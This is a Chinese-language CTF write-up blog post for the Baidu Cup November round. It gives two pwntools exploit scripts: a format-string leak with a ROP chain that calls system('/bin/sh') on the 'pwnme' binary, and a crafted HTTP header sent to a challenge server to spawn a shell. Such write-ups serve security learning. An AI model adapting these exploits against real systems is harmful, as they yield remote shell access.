百度杯十一月场

  • 会飞的鱼
  • 7 Minutes
  • March 5, 2019

题目链接

1.pwnme

格式化字符串漏洞,rop,数据类型强制转换

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import*

#p=remote('106.75.2.53', 10006)
p= process('./pwnme')

def leak(addr):
 p.recvuntil('>')
 p.sendline('2')
 p.recvuntil('please input new username(max lenth:20): \n')
 p.sendline('aaaa')
 p.recvuntil('please input new password(max lenth:20): \n')
 payload1 = '%12$s' + 'BIRDGO!' + p64(addr)
 p.send(payload1)
 p.recvuntil('>')
 p.sendline('1')
 content = p.recvuntil('BIRDGO!')
 if len(content) == 12:
   return '\x00'
 else:
   return content[5:-7]
   
#泄露system地址
p.recvuntil('Input your username(max lenth:40): \n')
p.sendline('A')
p.recvuntil('Input your password(max lenth:40): \n')
p.sendline('1')

d=DynELF(leak,elf=ELF('./pwnme'))
system_addr=d.lookup('system','libc')
log.info('system_addr:%#x'%system_addr)

p.recvuntil('>')
p.sendline('2')
p.recvuntil('please input new username(max lenth:20): \n')
p.sendline('cccc')
p.recvuntil('please input new password(max lenth:20): \n')

pppppr=0x0000000000400ecb
pop_rdi_ret=0x0000000000400ed3
init_addr=0x400EB0
binsh_addr=0x0000000000602000
read_got=0x0000000000601FC8

payload='a'*0x28
payload+=p64(pppppr)+p64(1)+p64(read_got)+p64(0x8)+p64(binsh_addr)+p64(0)  //__libc_csu_init()
payload+=p64(init_addr)+p64(0)*7   //这里为啥是7???
payload+=p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
payload=payload.ljust(0x101,'a')

p.sendline(payload)
p.sendline('/bin/sh\x00')

p.interactive()

2 . 3.7z

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import*

#p=process('./http')
p=remote('106.75.2.53', 80)

def check(data):
    payload=''
    for i in range(len(data)):
        payload+=chr(i^ord(data[i]))
    return payload

payload='User-Agent: '+check('useragent')
payload+='token: '+'/bin/sh'
payload+='\r\n\r\n'   #http协议

p.sendline(payload)

p.interactive()

© 2019 NO
POWER BY HEXO, THEME BY LAUGHING